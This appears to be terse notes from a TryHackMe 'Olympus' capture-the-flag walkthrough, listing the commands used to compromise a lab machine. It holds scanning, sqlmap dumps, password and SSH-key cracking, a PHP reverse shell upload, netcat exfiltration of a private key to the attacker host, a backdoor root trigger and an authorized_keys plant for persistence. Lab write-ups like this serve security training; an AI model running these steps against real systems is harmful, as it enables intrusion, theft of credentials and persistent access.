Room Link: https://tryhackme.com/room/olympusroom
Initial Scan
Kali
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
dirb http://olympus.thm
SQLMap
Kali
sqlmap -r req.txt --banner
Kali
sqlmap -r req.txt --tables
Kali
sqlmap -r req.txt --dbms=mysql --dump
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Rerun because VM crashed
Browser
Username: prometheus
Password: summertime
Browser
Username: prometheus
Password: summertime
Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
gobuster -U prometheus -P summertime dir -u chat.olympus.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
This was there before when we ran sqlmap
I deleted the old results of sqlmap to force it to rerun again as it was just giving the old results
Kali
rm -rf /root/.sqlmap/output/olympus.thm/
sqlmap -r req.txt --dbms=mysql --dump -T chats -D olympus
Kali
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
cd /home/zeus
cat zeus.txt
Victim
find / -perm -u=s -type f 2> /dev/null
Victim
ls -lah /usr/bin/cputils
/usr/bin/cputils
Netcat
Kali(receiving)
nc -l -p 1234 > id_rsa
Victim(sending)
cd /tmp
nc -w 3 $KALI 1234 < id_rsa
Kali
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt
Kali
ssh -i id_rsa zeus@$VICTIM
Password: snowflake
Privilege Escalation
Victim
cd /var/www/html/0aB44fdS3eDnLkpsz3deGv8TttR4sc/
cat VIGQFQFMYOST.php
Victim
/lib/defended/libc.so.99;uname -a; w; $suid_bd
whoami
Secret Flag
Kali
ssh-keygen -t rsa
cat /root/epic.pub
Victim
vi /root/.ssh/authorized_keys
Kali
ssh -i epic root@VICTIM
Victim
